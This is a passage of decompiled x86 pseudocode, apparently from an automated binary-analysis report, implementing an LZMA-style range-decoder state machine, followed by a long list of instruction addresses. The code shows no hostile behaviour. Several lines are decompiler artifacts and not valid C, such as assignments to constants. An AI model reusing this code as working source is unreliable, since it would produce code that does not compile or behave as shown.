													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406ce2
0x00406ce2
0x00406ce6
0x00406cf3
0x00406cfd
0x00000000
0x00406ce8
0x00406ce8
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00406c1c
0x00406c1f
0x00406f91
0x00406f91
0x00406f91
0x00406f94
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00407195
0x004071ab
0x004071b3
0x004071ba
0x004071bc
0x004071c3
0x004071c7
0x004071c7
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00407007
0x00407007
0x0040700d
0x0040700d
0x004067a9
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00406f91
0x00406f91
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00406bc4
0x00406bc8
0x00406be6
0x00406be9
0x00406bf0
0x00406bf3
0x00406bf6
0x00406bf9
0x00406bfc
0x00406bff
0x00406c01
0x00406c08
0x00406c09
0x00406c0b
0x00406c0e
0x00406c11
0x00406c14
0x00406c14
0x00406c19
0x00000000
0x00406c19
0x00406bca
0x00406bcd
0x00406bd0
0x00406bda
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x0040700d
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x00000000
0x00407013
0x0040700d
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
